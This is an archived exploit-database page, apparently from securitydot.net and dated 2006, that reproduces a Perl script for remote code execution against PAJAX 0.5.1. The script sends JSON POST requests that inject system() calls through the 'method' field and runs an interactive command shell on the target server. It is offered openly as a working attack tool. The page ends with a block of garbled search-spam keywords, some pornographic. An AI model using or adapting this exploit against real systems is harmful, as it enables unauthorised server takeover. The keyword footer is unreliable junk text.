about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PAJAX <= 0.5.1 Remote Code Execution Exploit



2006-04-13 PAJAX <= 0.5.1 Remote Code Execution Exploit
Rated as : Moderate Risk

#!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found
by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$host",
PeerPort => "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\":
\"bb2238f1186dad8d6370d2bab5f290f71\", \"className\":
\"Calculator\", \"method\":
\"add(1,1);system($cmd);\$obj->add\", \"params\":
[\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock
"Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = <$sock>)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}
securitydot.net - 2006-04-13

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:10:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo bho.bk wwwsex.com INDIAN ACT 200 /compo t511t INDIAN ACT Indian hot xxvideo Www.89.con xxvideo 200 /compo www\sex\co banglasexv xxvideo www.americ www.casabl news for c WWWDUDHWAL t704t banglasexv Searching Muy zorras Indan.Sax www.farmpr t2t WWW.Sex.Co 200 /compo 200 /compo rockshowpo free sex m easygals.c Yuvan.com vuln www.web918 www.okley. news for c Ajith Www.sexsex www.baiduy Sexy giris Fatpussy.c Yahoomail. larrymovie t250t t250t WWWDUDHWAL 200 /compo the fatsw InvisionPo